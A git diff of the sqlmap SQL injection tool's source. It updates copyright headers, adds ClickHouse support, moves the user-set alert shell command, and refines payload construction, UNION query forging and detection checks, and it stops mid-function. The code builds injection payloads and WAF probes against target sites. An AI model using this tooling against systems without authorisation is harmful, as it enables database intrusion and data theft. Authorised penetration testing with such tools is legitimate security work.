c8e6e1eaa8f..434c33ed215 100644 --- a/lib/controller/action.py +++ b/lib/controller/action.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 95a93182536..06bf5d8b69b 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -10,8 +10,6 @@ import random import re import socket -import subprocess -import sys import time from extra.beep.beep import beep @@ -46,7 +44,6 @@ from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError from lib.core.compat import xrange -from lib.core.convert import getBytes from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb @@ -95,7 +92,6 @@ from lib.core.settings import SLEEP_TIME_MARKER from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData @@ -221,6 +217,7 @@ def checkSqlInjection(place, parameter, value): if _ > 1: __ = 2 * (_ - 1) + 1 if _ == lower else 2 * _ unionExtended = True + test.request._columns = test.request.columns test.request.columns = re.sub(r"\b%d\b" % _, str(__), test.request.columns) title = re.sub(r"\b%d\b" % _, str(__), title) test.title = re.sub(r"\b%d\b" % _, str(__), test.title) @@ -274,15 +271,18 @@ def checkSqlInjection(place, parameter, value): logger.debug(debugMsg) continue - if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True): + elif kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True): debugMsg = "skipping test '%s' because " % title debugMsg += "its declared DBMS is different than provided" logger.debug(debugMsg) continue + elif kb.reduceTests is False: + pass + # Skip DBMS-specific test if it does not match the # previously identified DBMS (via DBMS-specific payload) - if injection.dbms and not intersect(payloadDbms, injection.dbms, True): + elif injection.dbms and not intersect(payloadDbms, injection.dbms, True): debugMsg = "skipping test '%s' because " % title debugMsg += "its declared DBMS is different than identified" logger.debug(debugMsg) @@ -290,7 +290,7 @@ def checkSqlInjection(place, parameter, value): # Skip DBMS-specific test if it does not match the # previously identified DBMS (via DBMS-specific error message) - if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True): + elif kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True): debugMsg = "skipping test '%s' because the heuristic " % title debugMsg += "tests showed that the back-end DBMS " debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests) @@ -509,7 +509,7 @@ def genCmpPayload(): falseRawResponse = "%s%s" % (falseHeaders, falsePage) # Checking if there is difference between current FALSE, original and heuristics page (i.e. not used parameter) - if not any((kb.negativeLogic, conf.string, conf.notString)): + if not any((kb.negativeLogic, conf.string, conf.notString, conf.code)): try: ratio = 1.0 seqMatcher = getCurrentThreadData().seqMatcher @@ -529,7 +529,7 @@ def genCmpPayload(): truePage, trueHeaders, trueCode = threadData.lastComparisonPage or "", threadData.lastComparisonHeaders, threadData.lastComparisonCode trueRawResponse = "%s%s" % (trueHeaders, truePage) - if trueResult and not(truePage == falsePage and not any((kb.nullConnection, conf.code))): + if trueResult and not (truePage == falsePage and not any((kb.nullConnection, conf.code))): # Perform the test's False request falseResult = Request.queryPage(genCmpPayload(), place, raise404=False) @@ -581,7 +581,7 @@ def genCmpPayload(): if injectable: if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)): - if all((falseCode, trueCode)) and falseCode != trueCode: + if all((falseCode, trueCode)) and falseCode != trueCode and trueCode != kb.heuristicCode: suggestion = conf.code = trueCode infoMsg = "%sparameter '%s' appears to be '%s' injectable (with --code=%d)" % ("%s " % paramType if paramType != parameter else "", parameter, title, conf.code) @@ -783,22 +783,8 @@ def genCmpPayload(): injection.conf.regexp = conf.regexp injection.conf.optimize = conf.optimize - if not kb.alerted: - if conf.beep: - beep() - - if conf.alert: - infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert - logger.info(infoMsg) - - try: - process = subprocess.Popen(getBytes(conf.alert, sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True) - process.wait() - except Exception as ex: - errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex)) - logger.error(errMsg) - - kb.alerted = True + if conf.beep: + beep() # There is no need to perform this test for other # tags @@ -813,7 +799,7 @@ def genCmpPayload(): except KeyboardInterrupt: warnMsg = "user aborted during detection phase" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.multipleTargets: msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]" @@ -829,11 +815,14 @@ def genCmpPayload(): choice = None while not ((choice or "").isdigit() and 0 <= int(choice) <= 6): if choice: - logger.warn("invalid value") + logger.warning("invalid value") msg = "enter new verbosity level: [0-6] " choice = readInput(msg, default=str(conf.verbose), checkBatch=False) conf.verbose = int(choice) setVerbosity() + if hasattr(test.request, "columns") and hasattr(test.request, "_columns"): + test.request.columns = test.request._columns + delattr(test.request, "_columns") tests.insert(0, test) elif choice == 'N': return None @@ -854,15 +843,13 @@ def genCmpPayload(): warnMsg = "in OR boolean-based injection cases, please consider usage " warnMsg += "of switch '--drop-set-cookie' if you experience any " warnMsg += "problems during data retrieval" - logger.warn(warnMsg) + logger.warning(warnMsg) if not checkFalsePositives(injection): if conf.hostname in kb.vulnHosts: kb.vulnHosts.remove(conf.hostname) - if NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE not in injection.notes: injection.notes.append(NOTE.FALSE_POSITIVE_OR_UNEXPLOITABLE) - else: injection = None @@ -979,7 +966,7 @@ def _(): if not retVal: warnMsg = "false positive or unexploitable injection point detected" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() @@ -1005,7 +992,7 @@ def checkSuhosinPatch(injection): warnMsg = "parameter length constraining " warnMsg += "mechanism detected (e.g. Suhosin patch). " warnMsg += "Potential problems in enumeration phase can be expected" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() @@ -1026,7 +1013,7 @@ def checkFilteredChars(injection): warnMsg += "filtered by the back-end server. There is a strong " warnMsg += "possibility that sqlmap won't be able to properly " warnMsg += "exploit this vulnerability" - logger.warn(warnMsg) + logger.warning(warnMsg) # inference techniques depend on character '>' if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)): @@ -1034,7 +1021,7 @@ def checkFilteredChars(injection): warnMsg = "it appears that the character '>' is " warnMsg += "filtered by the back-end server. You are strongly " warnMsg += "advised to rerun with the '--tamper=between'" - logger.warn(warnMsg) + logger.warning(warnMsg) kb.injection = popValue() @@ -1063,9 +1050,10 @@ def heuristicCheckSqlInjection(place, parameter): payload = "%s%s%s" % (prefix, randStr, suffix) payload = agent.payload(place, parameter, newValue=payload) - page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) + page, _, code = Request.queryPage(payload, place, content=True, raise404=False) kb.heuristicPage = page + kb.heuristicCode = code kb.heuristicMode = False parseFilePaths(page) @@ -1125,7 +1113,7 @@ def _(page): else: infoMsg += "not be injectable" - logger.warn(infoMsg) + logger.warning(infoMsg) kb.heuristicMode = True kb.disableHtmlDecoding = True @@ -1233,7 +1221,7 @@ def checkDynamicContent(firstPage, secondPage): if count > conf.retries: warnMsg = "target URL content appears to be too dynamic. " warnMsg += "Switching to '--text-only' " - logger.warn(warnMsg) + logger.warning(warnMsg) conf.textOnly = True return @@ -1291,7 +1279,7 @@ def checkStability(): warnMsg += "injectable parameters are detected, or in case of " warnMsg += "junk results, refer to user's manual paragraph " warnMsg += "'Page comparison'" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] " choice = readInput(message, default='C').upper() @@ -1340,44 +1328,6 @@ def checkStability(): return kb.pageStable -def checkString(): - if not conf.string: - return True - - infoMsg = "testing if the provided string is within the " - infoMsg += "target URL page content" - logger.info(infoMsg) - - page, headers, _ = Request.queryPage(content=True) - rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) - - if conf.string not in rawResponse: - warnMsg = "you provided '%s' as the string to " % conf.string - warnMsg += "match, but such a string is not within the target " - warnMsg += "URL raw response, sqlmap will carry on anyway" - logger.warn(warnMsg) - - return True - -def checkRegexp(): - if not conf.regexp: - return True - - infoMsg = "testing if the provided regular expression matches within " - infoMsg += "the target URL page content" - logger.info(infoMsg) - - page, headers, _ = Request.queryPage(content=True) - rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) - - if not re.search(conf.regexp, rawResponse, re.I | re.M): - warnMsg = "you provided '%s' as the regular expression " % conf.regexp - warnMsg += "which does not have any match within the target URL raw response. sqlmap " - warnMsg += "will carry on anyway" - logger.warn(warnMsg) - - return True - @stackedmethod def checkWaf(): """ @@ -1408,11 +1358,10 @@ def checkWaf(): retVal = False payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD) + place = PLACE.GET if PLACE.URI in conf.parameters: - place = PLACE.POST value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) else: - place = PLACE.GET value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) @@ -1542,7 +1491,31 @@ def checkConnection(suppressOutput=False): try: kb.originalPageTime = time.time() - Request.queryPage(content=True, noteResponseTime=False) + page, headers, _ = Request.queryPage(content=True, noteResponseTime=False) + + rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page) + + if conf.string: + infoMsg = "testing if the provided string is within the " + infoMsg += "target URL page content" + logger.info(infoMsg) + + if conf.string not in rawResponse: + warnMsg = "you provided '%s' as the string to " % conf.string + warnMsg += "match, but such a string is not within the target " + warnMsg += "URL raw response, sqlmap will carry on anyway" + logger.warning(warnMsg) + + if conf.regexp: + infoMsg = "testing if the provided regular expression matches within " + infoMsg += "the target URL page content" + logger.info(infoMsg) + + if not re.search(conf.regexp, rawResponse, re.I | re.M): + warnMsg = "you provided '%s' as the regular expression " % conf.regexp + warnMsg += "which does not have any match within the target URL raw response. sqlmap " + warnMsg += "will carry on anyway" + logger.warning(warnMsg) kb.errorIsNone = False @@ -1557,12 +1530,12 @@ def checkConnection(suppressOutput=False): elif wasLastResponseDBMSError(): warnMsg = "there is a DBMS error found in the HTTP response body " warnMsg += "which could interfere with the results of the tests" - logger.warn(warnMsg) + logger.warning(warnMsg) elif wasLastResponseHTTPError(): if getLastRequestHTTPError() not in (conf.ignoreCode or []): warnMsg = "the web server responded with an HTTP error code (%d) " % getLastRequestHTTPError() warnMsg += "which could interfere with the results of the tests" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.errorIsNone = True diff --git a/lib/controller/controller.py b/lib/controller/controller.py index e17470839f1..2e8d1b9d34e 100644 --- a/lib/controller/controller.py +++ b/lib/controller/controller.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -9,6 +9,7 @@ import os import re +import subprocess import time from lib.controller.action import action @@ -16,10 +17,8 @@ from lib.controller.checks import checkDynParam from lib.controller.checks import checkInternet from lib.controller.checks import checkNullConnection -from lib.controller.checks import checkRegexp from lib.controller.checks import checkSqlInjection from lib.controller.checks import checkStability -from lib.controller.checks import checkString from lib.controller.checks import checkWaf from lib.controller.checks import heuristicCheckSqlInjection from lib.core.agent import agent @@ -70,7 +69,7 @@ from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import EMPTY_FORM_FIELDS_REGEX -from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX +from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_REGEX from lib.core.settings import HOST_ALIASES from lib.core.settings import IGNORE_PARAMETERS from lib.core.settings import LOW_TEXT_PERCENT @@ -188,12 +187,12 @@ def _showInjections(): if conf.tamper: warnMsg = "changes made by tampering scripts are not " warnMsg += "included in shown payload content(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.hpp: warnMsg = "changes made by HTTP parameter pollution are not " warnMsg += "included in shown payload content(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _randomFillBlankFields(value): retVal = value @@ -434,7 +433,7 @@ def start(): setupTargetEnv() - if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp(): + if not checkConnection(suppressOutput=conf.forms): continue if conf.rParam and kb.originalPage: @@ -498,7 +497,7 @@ def start(): if skip: continue - if place not in conf.paramDict: + if place not in conf.paramDict or place not in conf.parameters: continue paramDict = conf.paramDict[place] @@ -513,6 +512,23 @@ def start(): testSqlInj = True paramKey = (conf.hostname, conf.path, place, parameter) + if kb.processUserMarks: + if testSqlInj and place not in (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI): + if kb.processNonCustom is None: + message = "other non-custom parameters found. " + message += "Do you want to process them too? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processNonCustom = choice == 'Y' + + if not kb.processNonCustom: + infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) + logger.info(infoMsg) + continue + if paramKey in kb.testedParams: testSqlInj = False @@ -534,7 +550,7 @@ def start(): infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) logger.info(infoMsg) - elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I)): + elif conf.paramExclude and (re.search(conf.paramExclude, parameter, re.I) or kb.postHint and re.search(conf.paramExclude, parameter.split(' ')[-1], re.I) or re.search(conf.paramExclude, place, re.I)): testSqlInj = False infoMsg = "skipping %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) @@ -547,7 +563,7 @@ def start(): logger.info(infoMsg) # Ignore session-like parameters for --level < 4 - elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)): + elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or any(_ in parameter.lower() for _ in CSRF_TOKEN_PARAMETER_INFIXES) or re.search(GOOGLE_ANALYTICS_COOKIE_REGEX, parameter)): testSqlInj = False infoMsg = "ignoring %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) @@ -558,7 +574,7 @@ def start(): if not check: warnMsg = "%sparameter '%s' does not appear to be dynamic" % ("%s " % paramType if paramType != parameter else "", parameter) - logger.warn(warnMsg) + logger.warning(warnMsg) if conf.skipStatic: infoMsg = "skipping static %sparameter '%s'" % ("%s " % paramType if paramType != parameter else "", parameter) @@ -600,6 +616,19 @@ def start(): kb.injections.append(injection) + if not kb.alerted: + if conf.alert: + infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert + logger.info(infoMsg) + try: + process = subprocess.Popen(conf.alert, shell=True) + process.wait() + except Exception as ex: + errMsg = "error occurred while executing '%s' ('%s')" % (conf.alert, getSafeExString(ex)) + logger.error(errMsg) + + kb.alerted = True + # In case when user wants to end detection phase (Ctrl+C) if not proceed: break @@ -614,7 +643,7 @@ def start(): if not injectable: warnMsg = "%sparameter '%s' does not seem to be injectable" % ("%s " % paramType if paramType != parameter else "", parameter) - logger.warn(warnMsg) + logger.warning(warnMsg) finally: if place == PLACE.COOKIE: @@ -711,7 +740,7 @@ def start(): if conf.multipleTargets: warnMsg = "user aborted in multiple target mode" - logger.warn(warnMsg) + logger.warning(warnMsg) message = "do you want to skip to the next target in list? [Y/n/q]" choice = readInput(message, default='Y').upper() @@ -751,7 +780,7 @@ def start(): warnMsg = "it appears that the target " warnMsg += "has a maximum connections " warnMsg += "constraint" - logger.warn(warnMsg) + logger.warning(warnMsg) if kb.dataOutputFlag and not conf.multipleTargets: logger.info("fetched data logged to text files under '%s'" % conf.outputPath) diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 09a7b95337a..9d69be5a107 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -14,6 +14,7 @@ from lib.core.settings import ACCESS_ALIASES from lib.core.settings import ALTIBASE_ALIASES from lib.core.settings import CACHE_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES from lib.core.settings import CRATEDB_ALIASES from lib.core.settings import CUBRID_ALIASES from lib.core.settings import DB2_ALIASES @@ -46,6 +47,8 @@ from plugins.dbms.altibase import AltibaseMap from plugins.dbms.cache.connector import Connector as CacheConn from plugins.dbms.cache import CacheMap +from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn +from plugins.dbms.clickhouse import ClickHouseMap from plugins.dbms.cratedb.connector import Connector as CrateDBConn from plugins.dbms.cratedb import CrateDBMap from plugins.dbms.cubrid.connector import Connector as CubridConn @@ -122,6 +125,7 @@ def setHandler(): (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn), (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn), (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn), + (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn), (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn), (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn), (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn), diff --git a/lib/core/__init__.py b/lib/core/__init__.py index 9daf7bb7372..ba25c56a216 100644 --- a/lib/core/__init__.py +++ b/lib/core/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ diff --git a/lib/core/agent.py b/lib/core/agent.py index 2e4321e4302..a9034f744c8 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -45,6 +45,7 @@ from lib.core.settings import BOUNDED_BASE64_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import BOUNDED_INJECTION_MARKER +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import GENERIC_SQL_COMMENT @@ -129,10 +130,12 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): origValue = re.split(r"['\">]", origValue)[-1] elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): - origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P[^"\[,]+\Z)', origValue) + match = re.search(r"['\"]", origValue) + quote = match.group(0) if match else '"' + origValue = extractRegexResult(r"%s\s*:\s*(?P\d+)\Z" % quote, origValue) or extractRegexResult(r"(?P[^%s]*)\Z" % quote, origValue) else: _ = extractRegexResult(r"(?s)(?P[^\s<>{}();'\"&]+\Z)", origValue) or "" - origValue = _.split('=', 1)[1] if '=' in _ else "" + origValue = _.split('=', 1)[1] if '=' in _ else _ elif place == PLACE.CUSTOM_HEADER: paramString = origValue origValue = origValue[origValue.find(',') + 1:] @@ -183,6 +186,11 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N newValue = newValue.replace(BOUNDARY_BACKSLASH_MARKER, '\\') newValue = self.adjustLateValues(newValue) + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5488 + if kb.customInjectionMark in origValue: + payload = newValue.replace(origValue, "") + newValue = origValue.replace(kb.customInjectionMark, payload) + # TODO: support for POST_HINT newValue = "%s%s%s" % (BOUNDED_BASE64_MARKER, newValue, BOUNDED_BASE64_MARKER) @@ -194,9 +202,9 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER): _ = "%s%s" % (origValue, kb.customInjectionMark) - if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and '"%s"' % _ not in paramString: + if kb.postHint == POST_HINT.JSON and isNumber(origValue) and not isNumber(newValue) and '"%s"' % _ not in paramString: newValue = '"%s"' % self.addPayloadDelimiters(newValue) - elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None: + elif kb.postHint == POST_HINT.JSON_LIKE and isNumber(origValue) and not isNumber(newValue) and re.search(r"['\"]%s['\"]" % re.escape(_), paramString) is None: newValue = "'%s'" % self.addPayloadDelimiters(newValue) else: newValue = self.addPayloadDelimiters(newValue) @@ -220,7 +228,8 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N def _(pattern, repl, string): retVal = string match = None - for match in re.finditer(pattern, string): + + for match in re.finditer(pattern, string or ""): pass if match: @@ -398,7 +407,7 @@ def adjustLateValues(self, payload): """ if payload: - for match in re.finditer(r"%s(.*?)%s" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload): + for match in re.finditer(r"(?s)%s(.*?)%s" % (BOUNDED_BASE64_MARKER, BOUNDED_BASE64_MARKER), payload): _ = encodeBase64(match.group(1), binary=False, encoding=conf.encoding or UNICODE_ENCODING, safe=conf.base64Safe) payload = payload.replace(match.group(0), _) @@ -415,6 +424,16 @@ def adjustLateValues(self, payload): payload = re.sub(r"(?i)\bORD\(", "ASCII(", payload) payload = re.sub(r"(?i)\bMID\(", "SUBSTR(", payload) payload = re.sub(r"(?i)\bNCHAR\b", "CHAR", payload) + elif hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) in (FORK.DM8,): + payload = re.sub(r"(?i)\bSUBSTRC\(", "SUBSTR(", payload) + if "SYS.USER$" in payload: + payload = re.sub(r"(?i)\bSYS.USER\$", "DBA_USERS", payload) + payload = re.sub(r"(?i)\bNAME\b", "USERNAME", payload) + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5057 + match = re.search(r"(=0x)(303a303a)3(\d{2,})", payload) + if match: + payload = payload.replace(match.group(0), "%s%s%s" % (match.group(1), match.group(2).upper(), "".join("3%s" % _ for _ in match.group(3)))) return payload @@ -482,7 +501,7 @@ def nullAndCastField(self, field): if field and Backend.getIdentifiedDbms(): rootQuery = queries[Backend.getIdentifiedDbms()] - if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast: + if field.startswith("(CASE") or field.startswith("(IIF") or conf.noCast and not (field.startswith("COUNT(") and Backend.getIdentifiedDbms() == DBMS.MSSQL): nulledCastedField = field else: if not (Backend.isDbms(DBMS.SQLITE) and not isDBMSVersionAtLeast('3')): @@ -574,7 +593,7 @@ def getFields(self, query): """ prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*" - fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I) + fieldsSelectTop = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) fieldsSelectCase = re.search(r"\ASELECT%s\s+(\(CASE WHEN\s+.+\s+END\))" % prefixRegex, query, re.I) @@ -589,6 +608,9 @@ def getFields(self, query): if not _: fieldsSelectFrom = None + if re.search(r"\bWHERE\b.+(MIN|MAX)", query, re.I): + fieldsMinMaxstr = None + fieldsToCastStr = fieldsNoSelect if fieldsSubstr: @@ -722,7 +744,7 @@ def concatQuery(self, query, unpack=True): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1) concatenatedQuery += "+'%s'" % kb.chars.stop elif fieldsSelectTop: - topNum = re.search(r"\ASELECT\s+TOP(\s+[\d]|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1) + topNum = re.search(r"\ASELECT\s+TOP(\s+\d+|\s*\([^)]+\))\s+", concatenatedQuery, re.I).group(1) concatenatedQuery = concatenatedQuery.replace("SELECT TOP%s " % topNum, "TOP%s '%s'+" % (topNum, kb.chars.start), 1) concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1) elif fieldsSelectCase: @@ -874,11 +896,16 @@ def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, if element > 0: unionQuery += ',' - if element == position: + if conf.uValues and conf.uValues.count(',') + 1 == count: + unionQuery += conf.uValues.split(',')[element] + elif element == position: unionQuery += query else: unionQuery += char + if conf.uValues: + unionQuery = unionQuery.replace(CUSTOM_INJECTION_MARK_CHAR, query) + if fromTable and not unionQuery.endswith(fromTable): unionQuery += fromTable @@ -1009,16 +1036,16 @@ def limitQuery(self, num, query, field=None, uniqueField=None): fromFrom = limitedQuery[fromIndex + 1:] orderBy = None - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.RAIMA): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CUBRID, DBMS.EXTREMEDB, DBMS.DERBY): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr - elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1) + elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) limitedQuery += " %s" % limitStr - elif Backend.getIdentifiedDbms() in (DBMS.DERBY, DBMS.CRATEDB): - limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE,): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, 1) limitedQuery += " %s" % limitStr elif Backend.getIdentifiedDbms() in (DBMS.FRONTBASE, DBMS.VIRTUOSO): diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 52fc2227fd5..5741b2e61ac 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/) +Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org) See the file 'LICENSE' for copying permission """ @@ -14,6 +14,7 @@ import os import sys import tempfile +import threading import zlib from lib.core.compat import xrange @@ -65,6 +66,8 @@ class BigArray(list): >>> _ = _ + [1] >>> _[-1] 1 + >>> len([_ for _ in BigArray(xrange(100000))]) + 100000 """ def __init__(self, items=None): @@ -72,6 +75,7 @@ def __init__(self, items=None): self.chunk_length = sys.maxsize self.cache = None self.filenames = set() + self._lock = threading.Lock() self._os_remove = os.remove self._size_counter = 0 @@ -93,18 +97,19 @@ def __iadd__(self, value): return self def append(self, value): - self.chunks[-1].append(value) + with self._lock: + self.chunks[-1].append(value) - if self.chunk_length == sys.maxsize: - self._size_counter += _size_of(value) - if self._size_counter >= BIGARRAY_CHUNK_SIZE: - self.chunk_length = len(self.chunks[-1]) - self._size_counter = None + if self.chunk_length == sys.maxsize: + self._size_counter += _size_of(value) + if self._size_counter >= BIGARRAY_CHUNK_SIZE: + self.chunk_length = len(self.chunks[-1]) + self._size_counter = None - if len(self.chunks[-1]) >= self.chunk_length: - filename = self._dump(self.chunks[-1]) - self.chunks[-1] = filename - self.chunks.append([]) + if len(self.chunks[-1]) >= self.chunk_length: + filename = self._dump(self.chunks[-1]) + self.chunks[-1] = filename + self.chunks.append([]) def extend(self, value): for _ in value: @@ -130,6 +135,17 @@ def index(self, value): return ValueError, "%s is not in list" % value + def close(self): + while self.filenames: + filename = self.filenames.pop() + try: + self._os_remove(filename) + except OSError: + pass + + def __del__(self): + self.close() + def _dump(self, chunk): try: handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY) @@ -168,8 +184,12 @@ def __setstate__(self, state): self.chunks, self.filenames = state def __getitem__(self, y): + length = len(self) + if 